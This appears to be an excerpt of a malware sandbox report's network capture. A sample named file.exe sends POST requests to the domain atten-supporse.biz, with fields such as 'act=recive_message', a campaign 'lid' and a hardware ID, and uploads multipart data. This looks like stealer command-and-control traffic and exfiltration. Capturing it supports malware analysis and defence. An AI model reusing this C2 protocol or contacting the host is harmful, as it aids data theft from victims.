                                                                                                                                                                                    2024-11-29 18:49:09 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 37 33 64 62 62 6a 35 34 38 6b 61 2f 6d 76 6a 33 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 31 37 32 32 66 61 34 36 61 36 64 33 63 36 33 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: CNT 1 CON 305MS-CV: 73dbbj548ka/mvj3.1Context: f1722fa46a6d3c63
                                                                                                                                                                                    2024-11-29 18:49:09 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                    2024-11-29 18:49:09 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 37 33 64 62 62 6a 35 34 38 6b 61 2f 6d 76 6a 33 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 31 37 32 32 66 61 34 36 61 36 64 33 63 36 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 39 7a 2b 50 5a 4c 67 39 31 67 42 54 59 51 52 67 6c 6f 56 44 6d 62 79 38 54 4b 65 6d 74 74 79 32 6e 35 43 4a 35 63 2f 71 55 49 31 57 6a 4b 41 38 6f 43 33 58 49 77 50 53 51 47 62 42 47 4a 53 58 41 49 47 49 74 63 42 6f 63 7a 53 67 31 52 79 4b 31 49 62 50 2f 74 6a 62 30 50 6a 61 41 4f 76 4b 79 63 33 47 36 50 36 73 58 77 2f 47
                                                                                                                                                                                    Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 73dbbj548ka/mvj3.2Context: f1722fa46a6d3c63<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAa9z+PZLg91gBTYQRgloVDmby8TKemtty2n5CJ5c/qUI1WjKA8oC3XIwPSQGbBGJSXAIGItcBoczSg1RyK1IbP/tjb0PjaAOvKyc3G6P6sXw/G
                                                                                                                                                                                    2024-11-29 18:49:09 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 37 33 64 62 62 6a 35 34 38 6b 61 2f 6d 76 6a 33 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 31 37 32 32 66 61 34 36 61 36 64 33 63 36 33 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                    Data Ascii: BND 3 CON\WNS 0 197MS-CV: 73dbbj548ka/mvj3.3Context: f1722fa46a6d3c63<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                    2024-11-29 18:49:10 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                    Data Ascii: 202 1 CON 58
                                                                                                                                                                                    2024-11-29 18:49:10 UTC58INData Raw: 4d 53 2d 43 56 3a 20 34 31 4f 53 59 48 31 73 58 30 4f 45 30 6d 42 51 73 78 64 67 62 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                    Data Ascii: MS-CV: 41OSYH1sX0OE0mBQsxdgbw.0Payload parsing failed.


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    2192.168.2.649709104.21.16.94431656C:\Users\user\Desktop\file.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:10 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                    Content-Length: 53
                                                                                                                                                                                    Host: atten-supporse.biz
                                                                                                                                                                                    2024-11-29 18:49:10 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                    2024-11-29 18:49:11 UTC1024INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:11 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Set-Cookie: PHPSESSID=2g8f87s66j45th4qi914nt1i67; expires=Tue, 25-Mar-2025 12:35:49 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RZYL79jM9ylRtda%2FBPU%2BeJedVv4%2BDs99GT9c0fDnU%2BRv4IHLDAl4c6%2BBqZB%2FsD5G9hKheoifPyjwccQdMWX0sTL8tt4QCWuPfVvmtbBIyIGIoXKTWjqKv1vsXAqAFz%2BM29p4B2I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 8ea4c6afdc1a8ce9-EWR
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1839&min_rtt=1839&rtt_var=690&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=955&delivery_rate=1585233&cwnd=231&unsent_bytes=0&cid=82be468f2ff56695&ts=1100&x=0"
                                                                                                                                                                                    2024-11-29 18:49:11 UTC345INData Raw: 33 65 63 36 0d 0a 64 70 65 6c 73 74 7a 6f 70 59 50 34 74 49 6e 59 42 45 34 64 49 54 68 41 7a 42 51 78 6f 43 54 4c 47 72 6a 64 76 74 72 65 72 47 67 4e 74 64 4f 51 35 74 79 4a 6f 59 76 52 71 2b 4a 77 50 47 68 45 46 47 4b 74 63 42 4f 61 51 71 70 32 79 37 69 53 2b 4b 6a 42 53 6b 7a 78 78 4e 36 76 6a 59 6d 68 6e 63 79 72 34 6c 38 31 50 30 52 57 59 76 59 32 56 4d 70 47 71 6e 62 61 76 4e 57 31 72 73 41 4c 48 76 76 43 32 72 6d 4c 77 65 4b 55 32 65 79 39 59 53 39 33 54 31 45 74 70 48 6b 54 6a 41 61 75 59 4a 72 6e 6e 4a 65 37 32 41 6b 37 39 74 62 5a 2f 70 57 4a 2b 4e 72 52 35 2f 6f 2b 62 48 78 45 57 69 79 71 63 46 72 49 54 4b 4e 2b 32 37 6e 55 71 72 66 4b 41 42 37 31 77 64 75 7a 67 74 58 76 6e 74 37 6e 75 32 73 76 50 77 30 61 4a 62 59 32 43 34 49 56 6d 33 76 4c 72
                                                                                                                                                                                    Data Ascii: 3ec6dpelstzopYP4tInYBE4dIThAzBQxoCTLGrjdvtrerGgNtdOQ5tyJoYvRq+JwPGhEFGKtcBOaQqp2y7iS+KjBSkzxxN6vjYmhncyr4l81P0RWYvY2VMpGqnbavNW1rsALHvvC2rmLweKU2ey9YS93T1EtpHkTjAauYJrnnJe72Ak79tbZ/pWJ+NrR5/o+bHxEWiyqcFrITKN+27nUqrfKAB71wduzgtXvnt7nu2svPw0aJbY2C4IVm3vLr
                                                                                                                                                                                    2024-11-29 18:49:11 UTC1369INData Raw: 43 53 6b 79 31 77 64 36 2f 68 38 66 7a 6b 74 33 67 76 33 51 6e 64 6b 35 58 49 71 4e 38 58 4d 46 47 72 6e 4c 51 73 4e 61 38 73 63 4d 4d 46 50 57 48 6e 76 36 4e 33 36 48 43 6c 73 69 2f 64 69 74 7a 56 52 67 59 37 6d 6b 64 32 77 61 75 64 4a 72 6e 6e 4c 43 35 7a 51 6b 66 2b 73 54 59 74 5a 6a 48 38 35 7a 62 37 71 68 67 4b 58 46 4a 57 54 43 6b 65 46 58 42 54 36 4a 78 33 37 6a 59 2b 50 4b 4f 44 51 79 31 6e 35 43 66 68 38 7a 74 6b 4d 48 72 2b 6e 6c 69 5a 67 4e 64 4c 75 34 75 45 38 5a 48 72 58 6e 65 73 64 4b 38 73 4d 67 45 47 66 72 42 32 72 36 4e 7a 65 6d 53 31 2b 61 78 61 53 78 36 54 6c 34 6b 6f 6e 64 57 67 67 6a 70 66 38 4c 2f 68 50 69 53 79 51 6b 47 74 2f 4c 54 73 49 54 41 39 39 72 4a 70 61 4d 6d 4b 33 4d 44 41 6d 4b 67 63 31 7a 51 52 37 74 39 31 4b 33 51 76 62
                                                                                                                                                                                    Data Ascii: CSky1wd6/h8fzkt3gv3Qndk5XIqN8XMFGrnLQsNa8scMMFPWHnv6N36HClsi/ditzVRgY7mkd2waudJrnnLC5zQkf+sTYtZjH85zb7qhgKXFJWTCkeFXBT6Jx37jY+PKODQy1n5Cfh8ztkMHr+nliZgNdLu4uE8ZHrXnesdK8sMgEGfrB2r6NzemS1+axaSx6Tl4kondWggjpf8L/hPiSyQkGt/LTsITA99rJpaMmK3MDAmKgc1zQR7t91K3Qvb
                                                                                                                                                                                    2024-11-29 18:49:11 UTC1369INData Raw: 74 2f 4c 54 73 49 54 41 39 39 72 4a 70 61 4d 6d 4b 33 4d 44 41 6d 4b 69 66 31 50 4a 54 4b 31 34 33 62 4c 5a 75 37 76 4e 42 78 50 2f 79 64 65 36 68 73 37 73 6e 4e 62 73 76 6d 4d 2b 65 6b 70 57 4c 75 34 34 45 38 56 65 36 53 43 61 6b 4e 75 75 76 2b 45 4a 42 66 79 48 7a 2f 43 54 68 2b 61 57 6c 72 50 36 59 53 6c 33 53 46 77 71 72 6d 52 57 7a 45 32 6f 63 74 79 2b 30 62 53 36 7a 67 73 55 38 38 76 51 75 59 33 56 38 35 2f 51 2b 62 41 6d 59 6a 39 45 51 6d 4c 32 4e 6d 58 53 55 62 68 75 6d 49 72 66 74 72 4c 4a 48 46 54 71 69 63 6e 2b 6a 63 75 68 77 70 62 67 75 6d 6f 72 64 30 56 65 4b 71 46 35 57 74 42 48 70 58 62 49 75 4e 79 78 73 73 45 47 48 66 6a 41 33 62 57 41 79 75 57 64 31 36 76 30 4a 69 74 6e 41 77 4a 69 6d 47 5a 65 7a 6d 69 69 64 4e 50 2f 77 2f 61 6c 6a 67 30
                                                                                                                                                                                    Data Ascii: t/LTsITA99rJpaMmK3MDAmKif1PJTK143bLZu7vNBxP/yde6hs7snNbsvmM+ekpWLu44E8Ve6SCakNuuv+EJBfyHz/CTh+aWlrP6YSl3SFwqrmRWzE2octy+0bS6zgsU88vQuY3V85/Q+bAmYj9EQmL2NmXSUbhumIrftrLJHFTqicn+jcuhwpbgumord0VeKqF5WtBHpXbIuNyxssEGHfjA3bWAyuWd16v0JitnAwJimGZezmiidNP/w/aljg0
                                                                                                                                                                                    2024-11-29 18:49:11 UTC1369INData Raw: 4c 61 4c 79 65 36 62 30 75 36 2f 59 69 74 37 52 56 56 69 34 44 5a 55 32 67 62 78 4f 50 57 59 36 66 71 64 39 45 6f 4c 75 39 36 51 75 59 61 48 75 64 72 61 36 4c 5a 75 49 33 6c 4b 56 69 69 6e 66 56 2f 4a 51 71 56 78 33 37 6e 64 76 62 6e 50 44 68 6a 2f 77 64 4f 39 68 63 6a 75 6b 70 61 6c 2b 6d 45 30 50 78 73 61 42 37 6c 39 58 63 51 47 74 6a 62 44 2f 39 75 30 2f 4a 5a 4b 47 50 7a 42 31 72 75 47 78 75 65 53 30 2b 4f 2b 5a 79 70 35 51 46 55 6d 71 33 64 63 78 6b 71 6e 63 74 75 2b 30 4c 4f 7a 78 51 39 55 75 34 66 58 70 73 71 66 6f 61 76 56 2f 61 31 32 49 44 39 63 46 44 76 75 63 56 2b 43 48 75 6c 35 79 4c 58 57 74 72 6e 42 44 78 66 36 77 4e 32 34 68 73 33 6f 6b 74 44 6b 73 33 51 76 63 30 31 64 4c 4b 4a 34 58 73 68 46 70 44 69 55 2f 39 75 67 2f 4a 5a 4b 4f 50 4c 4b
                                                                                                                                                                                    Data Ascii: LaLye6b0u6/Yit7RVVi4DZU2gbxOPWY6fqd9EoLu96QuYaHudra6LZuI3lKViinfV/JQqVx37ndvbnPDhj/wdO9hcjukpal+mE0PxsaB7l9XcQGtjbD/9u0/JZKGPzB1ruGxueS0+O+Zyp5QFUmq3dcxkqnctu+0LOzxQ9Uu4fXpsqfoavV/a12ID9cFDvucV+CHul5yLXWtrnBDxf6wN24hs3oktDks3Qvc01dLKJ4XshFpDiU/9ug/JZKOPLK
                                                                                                                                                                                    2024-11-29 18:49:11 UTC1369INData Raw: 6e 7a 6e 38 54 35 2b 69 68 73 65 46 73 61 65 75 35 41 56 4e 4a 57 71 6a 72 72 71 64 2b 75 74 38 4d 47 56 4f 71 4a 79 66 36 4e 79 36 48 43 6c 75 32 31 62 79 39 77 51 6c 4d 75 6f 33 4e 61 78 30 65 76 66 4e 43 31 33 4c 36 36 7a 77 38 65 39 73 62 61 74 34 33 50 35 70 6e 45 71 2f 51 6d 4b 32 63 44 41 6d 4b 48 63 55 48 4d 56 75 6c 6e 6c 4b 61 63 76 37 43 4f 55 6c 54 78 7a 64 2b 36 6a 63 76 6e 6e 39 44 6d 75 32 6b 74 66 30 78 65 4b 61 64 77 55 73 39 44 70 48 7a 49 74 64 65 33 73 4d 63 47 47 62 57 4a 6b 4c 6d 53 68 37 6e 61 35 2b 61 30 61 43 74 70 41 30 56 73 74 7a 5a 55 7a 67 62 78 4f 4e 75 7a 30 37 75 7a 7a 51 6b 56 2f 39 58 43 73 6f 50 50 35 4a 62 64 35 62 78 30 4b 6e 42 4b 57 53 47 6e 63 56 76 4f 54 4b 70 2f 6d 76 47 63 76 36 53 4f 55 6c 54 57 30 4d 43 7a 79
                                                                                                                                                                                    Data Ascii: nzn8T5+ihseFsaeu5AVNJWqjrrqd+ut8MGVOqJyf6Ny6HClu21by9wQlMuo3Nax0evfNC13L66zw8e9sbat43P5pnEq/QmK2cDAmKHcUHMVulnlKacv7COUlTxzd+6jcvnn9Dmu2ktf0xeKadwUs9DpHzItde3sMcGGbWJkLmSh7na5+a0aCtpA0VstzZUzgbxONuz07uzzQkV/9XCsoPP5Jbd5bx0KnBKWSGncVvOTKp/mvGcv6SOUlTW0MCzy
                                                                                                                                                                                    2024-11-29 18:49:11 UTC1369INData Raw: 57 37 62 4e 67 4b 33 6c 4e 53 43 65 6f 65 56 7a 4c 54 36 31 77 32 62 2f 59 76 4c 76 4c 43 52 6a 2b 77 4e 4f 78 6a 73 37 76 6b 39 6d 72 39 43 59 72 5a 77 4d 43 59 6f 39 74 55 4d 35 4c 36 57 65 55 70 70 79 2f 73 49 35 53 56 50 6e 4a 31 62 36 41 77 65 57 66 30 4f 47 2f 5a 69 64 38 54 46 34 6b 71 6e 6c 54 79 55 2b 6f 66 74 2b 31 31 37 36 78 7a 51 77 53 74 59 6d 51 75 5a 4b 48 75 64 72 32 38 4c 64 71 4b 7a 39 63 46 44 76 75 63 56 2b 43 48 75 6c 7a 31 72 76 62 75 4c 48 4e 41 68 48 78 7a 64 57 2b 67 74 58 70 6d 74 48 35 71 47 59 6c 65 6b 39 5a 49 71 70 77 57 73 52 46 72 54 69 55 2f 39 75 67 2f 4a 5a 4b 4f 66 6e 41 2b 62 6d 52 68 2f 37 55 7a 36 75 39 61 6d 77 6e 41 31 73 70 70 48 6c 65 77 55 43 71 63 39 2b 31 33 62 2b 30 77 78 67 58 2b 73 6a 55 76 6f 58 42 35 35
                                                                                                                                                                                    Data Ascii: W7bNgK3lNSCeoeVzLT61w2b/YvLvLCRj+wNOxjs7vk9mr9CYrZwMCYo9tUM5L6WeUppy/sI5SVPnJ1b6AweWf0OG/Zid8TF4kqnlTyU+oft+1176xzQwStYmQuZKHudr28LdqKz9cFDvucV+CHulz1rvbuLHNAhHxzdW+gtXpmtH5qGYlek9ZIqpwWsRFrTiU/9ug/JZKOfnA+bmRh/7Uz6u9amwnA1sppHlewUCqc9+13b+0wxgX+sjUvoXB55
                                                                                                                                                                                    2024-11-29 18:49:11 UTC1369INData Raw: 64 43 70 38 56 56 6c 6c 6b 45 68 30 31 45 79 75 61 4e 32 6f 30 2f 6a 79 6a 67 56 55 72 66 36 51 74 34 33 63 38 49 7a 62 2b 37 30 6d 45 7a 45 44 51 6d 4c 32 4e 6d 62 42 53 4b 64 2f 7a 4b 36 52 6e 36 72 45 44 51 54 79 30 4e 2f 2b 78 49 66 6e 32 6f 36 34 39 43 59 6f 62 67 4d 43 63 76 77 74 42 70 45 52 2b 53 72 46 38 63 58 34 71 6f 35 53 52 72 75 48 77 76 37 53 68 36 61 5a 78 50 6d 38 5a 54 70 38 42 47 51 63 69 57 78 65 78 46 47 34 52 75 53 34 78 72 57 36 32 52 74 59 34 4d 54 65 73 49 33 52 6f 64 53 57 35 50 6f 2b 46 54 38 4c 47 68 33 67 4e 6b 75 43 48 75 6c 4e 32 62 48 53 76 36 72 66 52 7a 50 76 79 74 61 70 6d 34 65 76 32 74 43 72 34 6a 5a 69 50 30 64 4c 59 76 59 6d 41 5a 6b 54 2b 69 2b 4b 37 63 50 32 70 59 34 63 56 4b 32 56 6e 76 36 59 68 37 6e 61 6b 65 69
                                                                                                                                                                                    Data Ascii: dCp8VVllkEh01EyuaN2o0/jyjgVUrf6Qt43c8Izb+70mEzEDQmL2NmbBSKd/zK6Rn6rEDQTy0N/+xIfn2o649CYobgMCcvwtBpER+SrF8cX4qo5SRruHwv7Sh6aZxPm8ZTp8BGQciWxexFG4RuS4xrW62RtY4MTesI3RodSW5Po+FT8LGh3gNkuCHulN2bHSv6rfRzPvytapm4ev2tCr4jZiP0dLYvYmAZkT+i+K7cP2pY4cVK2Vnv6Yh7nakei
                                                                                                                                                                                    2024-11-29 18:49:11 UTC1369INData Raw: 77 4e 6c 62 4f 35 75 45 35 6f 47 6e 48 76 55 73 64 75 75 72 59 4d 74 47 76 4c 47 78 71 36 64 79 4b 48 55 6c 75 33 36 50 6e 34 78 41 31 34 7a 37 69 34 44 6b 42 33 38 4b 34 33 76 6a 71 66 79 31 30 6f 43 74 5a 2b 43 38 4d 72 56 6f 63 4b 57 72 4c 6c 30 50 6e 6c 41 54 43 48 70 53 47 33 6c 53 4b 35 35 7a 4b 2f 4c 74 2f 50 67 50 44 58 4c 2b 63 57 39 68 4d 6e 6d 6a 4d 65 72 39 43 59 6a 50 78 74 6a 59 75 59 32 62 49 77 47 73 54 69 43 2f 2b 6d 37 73 73 41 4e 41 75 53 4b 39 37 43 4e 78 76 65 4b 77 65 54 31 53 42 70 65 41 78 52 69 71 44 59 4c 6b 41 6a 70 66 4d 76 2f 68 4f 6a 75 6c 56 39 48 6f 70 65 43 6f 63 54 65 6f 59 79 57 73 2b 67 6f 62 47 30 44 41 6d 4c 70 64 55 48 51 51 4b 70 75 32 66 6a 69 68 70 76 41 44 52 58 6a 31 39 32 79 71 38 54 77 6b 4f 6a 56 72 32 55 69
                                                                                                                                                                                    Data Ascii: wNlbO5uE5oGnHvUsduurYMtGvLGxq6dyKHUlu36Pn4xA14z7i4DkB38K43vjqfy10oCtZ+C8MrVocKWrLl0PnlATCHpSG3lSK55zK/Lt/PgPDXL+cW9hMnmjMer9CYjPxtjYuY2bIwGsTiC/+m7ssANAuSK97CNxveKweT1SBpeAxRiqDYLkAjpfMv/hOjulV9HopeCocTeoYyWs+gobG0DAmLpdUHQQKpu2fjihpvADRXj192yq8TwkOjVr2Ui
                                                                                                                                                                                    2024-11-29 18:49:11 UTC1369INData Raw: 79 6a 64 31 44 4d 52 62 74 71 33 4c 7a 4b 75 2f 76 77 4e 44 6e 6e 77 4d 43 39 79 50 62 73 6e 73 44 2b 75 58 59 72 51 58 31 33 4d 4b 6c 6d 55 49 42 71 72 6e 58 57 67 65 4b 50 72 63 6b 61 56 74 50 45 78 72 33 4b 69 61 47 43 6c 72 50 36 53 7a 35 34 55 31 6c 67 67 6e 46 65 7a 67 61 32 4e 73 50 2f 79 76 6a 6b 6e 55 52 55 35 34 65 49 2f 73 33 45 38 34 6a 51 36 4b 78 6c 61 30 46 39 64 7a 43 70 5a 6c 43 41 64 36 52 38 7a 4b 72 66 71 4c 76 77 4e 44 6e 6e 77 4d 43 39 79 4f 4c 62 32 4f 66 39 75 57 59 69 65 41 4d 55 59 72 59 32 43 34 4a 72 75 33 2f 4b 76 4a 36 64 68 6f 77 37 41 76 62 48 33 72 6e 4b 69 61 47 57 6c 72 50 36 61 7a 35 34 55 31 6c 75 71 57 78 55 67 6c 6e 6e 59 5a 71 70 6e 4f 44 76 67 45 6f 47 74 5a 2b 51 2b 59 54 4b 34 4a 6e 59 36 4b 68 30 4b 6e 78 56 57
                                                                                                                                                                                    Data Ascii: yjd1DMRbtq3LzKu/vwNDnnwMC9yPbsnsD+uXYrQX13MKlmUIBqrnXWgeKPrckaVtPExr3KiaGClrP6Sz54U1lggnFezga2NsP/yvjknURU54eI/s3E84jQ6Kxla0F9dzCpZlCAd6R8zKrfqLvwNDnnwMC9yOLb2Of9uWYieAMUYrY2C4Jru3/KvJ6dhow7AvbH3rnKiaGWlrP6az54U1luqWxUglnnYZqpnODvgEoGtZ+Q+YTK4JnY6Kh0KnxVW


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    3192.168.2.649710104.21.16.94431656C:\Users\user\Desktop\file.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:12 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=Z1PVRLS4DJG
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                    Content-Length: 12823
                                                                                                                                                                                    Host: atten-supporse.biz
                                                                                                                                                                                    2024-11-29 18:49:12 UTC12823OUTData Raw: 2d 2d 5a 31 50 56 52 4c 53 34 44 4a 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 30 43 36 44 39 43 43 35 32 30 45 31 37 32 32 45 46 41 33 44 36 33 42 36 39 45 37 43 41 31 34 0d 0a 2d 2d 5a 31 50 56 52 4c 53 34 44 4a 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 5a 31 50 56 52 4c 53 34 44 4a 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 5a 31 50 56 52 4c 53 34 44 4a 47
                                                                                                                                                                                    Data Ascii: --Z1PVRLS4DJGContent-Disposition: form-data; name="hwid"F0C6D9CC520E1722EFA3D63B69E7CA14--Z1PVRLS4DJGContent-Disposition: form-data; name="pid"2--Z1PVRLS4DJGContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--Z1PVRLS4DJG
                                                                                                                                                                                    2024-11-29 18:49:13 UTC1024INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:13 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Set-Cookie: PHPSESSID=4ce43t37npnh2mvnbphtuc3pap; expires=Tue, 25-Mar-2025 12:35:52 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Lj4wb3wA66gyn%2Fsjy0FiL9du97d6maZXiwH4AIr0hPV6r%2FSbhZSuWbxJR8Zb65YVwYyfH5N3E%2FnkM%2FeYCpWJGQJ2qgCJb35xleNqPVrqUqoo7guoewQHS%2FNXQpBYbySNRqEqdM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 8ea4c6c04fc74362-EWR
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1824&min_rtt=1810&rtt_var=689&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2847&recv_bytes=13758&delivery_rate=1613259&cwnd=250&unsent_bytes=0&cid=daff0c98cbbccd56&ts=1067&x=0"
                                                                                                                                                                                    2024-11-29 18:49:13 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                    Data Ascii: fok 8.46.123.228
                                                                                                                                                                                    2024-11-29 18:49:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    4192.168.2.649711104.21.16.94431656C:\Users\user\Desktop\file.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:15 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=O7P3H9GI5
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                    Content-Length: 15057
                                                                                                                                                                                    Host: atten-supporse.biz
